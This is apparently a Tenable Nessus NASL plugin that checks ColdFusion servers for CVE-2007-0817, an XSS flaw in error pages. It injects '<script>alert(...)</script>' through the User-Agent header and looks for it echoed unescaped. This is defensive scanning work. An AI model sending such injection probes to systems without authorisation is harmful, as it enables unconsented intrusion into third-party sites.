#
# (C) Tenable Network Security
#


if (description)
{
  script_id(24278);
  script_version("$Revision: 1.5 $");

  script_cve_id("CVE-2007-0817");
  script_bugtraq_id(22401);
  script_xref(name:"OSVDB", value:"32120");

  script_name(english:"ColdFusion Error Processing Request Cross-Site Scripting Vulnerability");
  script_summary(english:"Checks for an XSS flaw in ColdFusion");

  desc = "
Synopsis :

The remote web server is vulnerable to a cross-site scripting attack. 

Description :

The remote web server fails to sanitize user-supplied input to the
User-Agent header before using it to generate dynamic content in an
error page.  An unauthenticated remote attacker may be able to
leverage this issue to inject arbitrary HTML or script code into a
user's browser to be executed within the security context of the
affected site. 

See also :

http://www.securityfocus.com/archive/1/459178/30/0/threaded
http://www.adobe.com/support/security/bulletins/apsb07-04.html

Solution :

Apply the appropriate patch as described in the vendor advisory above. 

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_kb_item("Services/www");
if (!port) port = 80;
if (!get_port_state(port)) exit(0);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);


# Make sure it's ColdFusion.
res = http_get_cache(item:"/CFIDE/administrator/index.cfm", port:port);
if (res == NULL) exit(0);
if ("ColdFusion Administrator Login" >!< res) exit(0);


# Send a request to exploit the flaw.
xss = raw_string("<script>alert(", SCRIPT_NAME, ")</script>");
url = string("/CFIDE/administrator/nessus-", unixtime(), ".cfm");
req = http_get(item:url, port:port);
req = ereg_replace(
  string:req,
  pattern:"^(.+)User-Agent:[^" + string("\r\n") + "]+(.+)",
  replace:"\1User-Agent: " + xss + "\2"
);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);


# There's a problem if our exploit appears as the user agent.
browser = strstr(res, ">Browser&nbsp;&nbsp;</");
if (browser)
{
  browser = browser - strstr(browser, "</tr>");
  browser = strstr(browser, "<td>");
  browser = browser - strstr(browser, "</td>");
  # nb: browser includes some extra markup.
  if (string(">", xss) >< browser) security_warning(port);
}
